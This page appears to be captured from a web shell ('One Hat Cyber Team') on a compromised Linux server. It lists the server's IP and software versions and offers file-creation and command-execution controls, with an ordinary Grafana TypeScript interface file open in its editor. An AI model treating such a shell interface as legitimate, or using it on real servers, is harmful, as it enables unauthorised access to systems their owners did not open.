⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.50
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
grafana
/
public
/
app
/
types
/
Edit File: folders.ts
import { WithAccessControlMetadata } from '@grafana/data'; export interface FolderDTO extends WithAccessControlMetadata { canAdmin: boolean; canDelete: boolean; canEdit: boolean; canSave: boolean; created: string; createdBy: string; hasAcl: boolean; id: number; parentUid?: string; parents?: FolderDTO[]; title: string; uid: string; updated: string; updatedBy: string; url: string; version?: number; } export interface FolderState { id: number; uid: string; title: string; url: string; canSave: boolean; canDelete: boolean; hasChanged: boolean; version: number; } export interface DescendantCountDTO { // TODO: make this required once nestedFolders is enabled by default folder?: number; dashboard: number; librarypanel: number; alertrule: number; } export interface DescendantCount { folder: number; dashboard: number; libraryPanel: number; alertRule: number; } export interface FolderInfo { /** * @deprecated use uid instead. */ id?: number; // can't be totally removed as search and alerts api aren't supporting folderUids yet. It will break DashList and AlertList panel uid?: string; title?: string; url?: string; }
Simpan